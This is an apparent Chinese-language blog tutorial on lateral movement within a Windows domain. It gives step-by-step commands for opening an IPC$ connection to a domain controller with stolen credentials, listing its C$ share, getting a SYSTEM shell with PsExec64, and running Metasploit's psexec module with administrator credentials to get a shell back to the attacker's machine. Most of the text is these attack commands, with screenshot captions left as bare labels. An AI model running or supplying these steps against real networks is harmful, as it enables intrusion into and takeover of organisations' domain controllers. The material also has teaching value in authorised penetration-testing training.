域内横向移动

• 域内横向移动是指,攻击者以攻陷的系统为跳板,访问其他域内主机,扩大攻击战果

Windows远程连接

• IPC(Internet Process Connection)指进程间通信开放的命名管道

• IPC可以通过验证用户名和密码获得相应权限,比如远程管理计算机和查看共享资源

• 通过ipc$,可以与目标机器建立连接,利用这个连接,可以访问目标机器的文件、上传、下载以及运行命令等

建立IPC$

net use \\域控ip\ipc$ /user:用户名 密码

建立ipc

查看建立的连接

net use

查看建立的连接

访问远程文件

dir \\域控ip\c$

查看目录

使用PsExec64脚本反弹shell

1)先将脚本复制到攻击机

复制脚本

2)在脚本所在文件夹打开cmd,并执行以下命令

PsExec64.exe \\域控ip -s cmd.exe

等待连接

3)等待连接完成,返回shell

连接完成

msf中的psexec模块

1、进入msf

msfconsole

进入msf

2、搜索psexec模块

search psexec

搜索模块

3、使用模块并查看参数设置

use 4

show options

查看参数设置

4、设置参数并执行

set rhosts 域控ip

set lhost 攻击机内网ip

set smbuser administrator

set smbpass 密码

run

设置参数并执行

5、返回shell

返回shell
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
禁止转载,如需转载请通过简信或评论联系作者。

相关阅读更多精彩内容

友情链接更多精彩内容